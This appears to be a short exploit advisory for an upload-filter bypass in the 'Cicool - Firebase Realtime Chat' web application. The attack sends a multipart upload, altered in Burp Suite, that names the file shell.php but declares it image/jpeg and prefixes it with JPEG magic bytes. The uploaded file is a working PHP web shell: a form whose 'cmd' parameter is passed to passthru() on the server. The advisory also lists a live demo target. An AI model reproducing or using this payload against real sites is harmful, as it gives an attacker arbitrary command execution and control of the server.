[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : Cicool - Firebase Realtime Chat upload shell bypass
[+] Author :
[+] Team: VHB Group
[+] Tested on : Windows 10/Linux
[+] Home Page: https://codecanyon.net/item/cicool-firebase-realtime-chat/24842321
[+]
[+] Demo : https://cicool.go-moment.com/version/v3//uploads/chat/20191021151333-2019-10-21chat151329.html
POC
fix queries with burp suite. You can go to the chat page and edit the information
Content-Disposition: form-data; name="qqfile"; filename="shell.php"
Content-Type: image/jpeg
ÿØÿà
<form action="" method="get">
Command: <input type="text" name="cmd" /><input type="submit" value="Exec" />
</form>
Output:<br />
<pre><?php passthru($_REQUEST['cmd'], $result); ?></pre>
-----------------------------307831217212391--